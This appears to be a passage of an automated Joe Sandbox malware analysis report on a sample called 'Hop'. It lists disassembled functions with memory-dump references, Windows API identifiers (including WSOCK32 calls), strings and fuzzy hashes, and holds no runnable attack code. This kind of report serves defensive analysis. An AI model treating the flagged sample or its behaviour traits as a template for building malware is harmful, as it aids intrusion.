                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5d12d7917d180fae42e70208a517994a3cecee53fefd8785e116101941244e4d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e698672ba2fde47866938956bdd2d104ce607d52ab9d410fe63d21d4b336d6a1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DC1BC32B29A45CAEB15CB64D4817AC3771FB49BA8F115239DE2E9B794CF38E095C300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DCB9C Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                                                                                                                                                                                                                          • Instruction ID: 219bea8f04b5d5a5d617d03f51c912bd55c064dff997db7a6f9e63b034ba41f3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13f1134b8e25db497226d3983802e6b8d12e784a5e0e0389ad28e06e0f0fc450
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98618B25A0C643C6FB24AB69A8407BA2751BF80BECF118539EB1D836E5CE3DE4C1D700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4724E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                                                                                          • API String ID: 500310315-1684325040
                                                                                                                                                                                                                                                                                                          • Opcode ID: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5de3768bfe2fcc77ca6750f9f8a41170fd8703e42066328fb604266a9e4e8d3d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 685836145ac74aa4a2cd79fc47d922bc0e29f1722bd05d5705c662cecaadf47c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D61A032A18646CAEB20DF25E9405B977B4FF84798F44023AEA4EC3A95DF3CE581D740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E12A4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageReleaseScreenSendText
                                                                                                                                                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                                          • API String ID: 3721556410-2107944366
                                                                                                                                                                                                                                                                                                          • Opcode ID: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                                                                                                                                                                                                                          • Instruction ID: 59baeb17799f10b5eaa19a8ee80af7fc39b589c632b9f575dfe8066c94d8623b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d033586eeb8420df0584d02cad3e0ad78160aa9a1a2060901ffcbfff1dfca609
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80616C76A15A52C5EB40DF61E8909ED3760FF88B9CF51013AED1E93AA6DF38E585C300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4AA6DC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                          • String ID: 2$P
                                                                                                                                                                                                                                                                                                          • API String ID: 93392585-1110268094
                                                                                                                                                                                                                                                                                                          • Opcode ID: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: a8f6ceeb1c08e05cdec512f5fec84384a1fcce8d69267fdb369f28539a22e28f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4d75c7bed3dc32d74565b12e7beeeeebc4fd81d0a729176aca41e8b187ce2d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38518D32E04642C9F768CF6594402BD67A5BF84B9CF24813DDA5AA7694DFB8D4C7CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4AB400 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: IconLoad_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                                                          • API String ID: 4060274358-404129466
                                                                                                                                                                                                                                                                                                          • Opcode ID: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 268b06b0007dd300c8f7ed90b0adc667cb4e8fdba34a0e1420b9246f56a18eb6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b636dc1b51594c2af202ed54f4e4bdeb97e8f240ec4436fd1e847df07db7b1d4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57216B31B0CB82C5FA25AB16A9011BA6251BF85798F44403DEE4DD779AEF7CE488C300
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4ACC44 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                          • API String ID: 4051287042-3128320259
                                                                                                                                                                                                                                                                                                          • Opcode ID: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                                                                                                                                                                                                                          • Instruction ID: c0d0c2195e39f595a4a860c2b56ac1f3ec359a873bd0ea6059780464889da069
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02e40095ef40720f69863dbac7a2070404752031add831b0985804f9b4f72438
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04115EB5B18B86D2D734CB24F445BEA2260FF88758F81043EE64E83A58DE7CD189C740
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E29E4 Relevance: 12.3, APIs: 8, Instructions: 254windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1211466189-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                                                                                                                                                                                                                          • Instruction ID: d98fc38b97e3dd00164cbbb5f66b1051057114de9ca434ca73508c1c2b94126d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1e2e441c9291e36cebb6767608181e9d23d9b0bd25b43b6ce96c6e1de2e754f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15A1C266B18553C6E769CF25E544B7977A1FF84B58F125039DE0A83AA0DF3CE8A0C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C45428C Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                                                                                                                                                                                                                          • Instruction ID: e6df0d9e0469baa6db4c20b55bbdb248f590dba3f44d23bf1620d1d35089c754
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87c66640600301fc3614396531e44b743e01540278fec1b87f8964912ffd81f2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51517B32E0C182CAFB659B29A45837D3692BF86B4CF185579C50ECB6B5CE6CA4C8C341
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4D991C Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6364efc9e8577816dd0c766e373b0b6b76035318070ced3763d2cd8590819055
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9674a36d8164cb560b58a036ea6f3e8bd8e6a73e44ede240e929598dcb41685d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41BC72A18681C7E764CF21A454B6ABBA0FB98BD5F154139EF8A83B54DF3CD480CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C470A4C Relevance: 10.8, APIs: 7, Instructions: 294COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4e6660bd3986bc334eeaece1bb263038425c722b0abe9506244dd788dc5e8107
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 329cf7ad438edc5c76dcb0b9fad9cd181248692e257404cd766d6ec6700348b5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAC1F262A0978AC5FA648F15A40067E2BB1BF90B88F550139EA4E833D6CF3DE8C1D301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4B1250 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #77.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B133B
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1391
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1478
                                                                                                                                                                                                                                                                                                          • #24.OLEAUT32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B149F
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B14B0
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B151E
                                                                                                                                                                                                                                                                                                          • #23.WSOCK32(?,?,00000001,00000000,00000001,?,00000000,00000047,?,00007FF68C4B0CA8,?,?,00000000,00007FF68C4C86CF), ref: 00007FF68C4B1593
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
                                                                                                                                                                                                                                                                                                          • Instruction ID: b21d3d3545c78290f6a02579401ec1e2a8e3aa101a80fe3740adadb7b02dfb05
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2585bf9d99523b85a6387ebb36db1e93d42442dc18b734288afeab1606f91b78
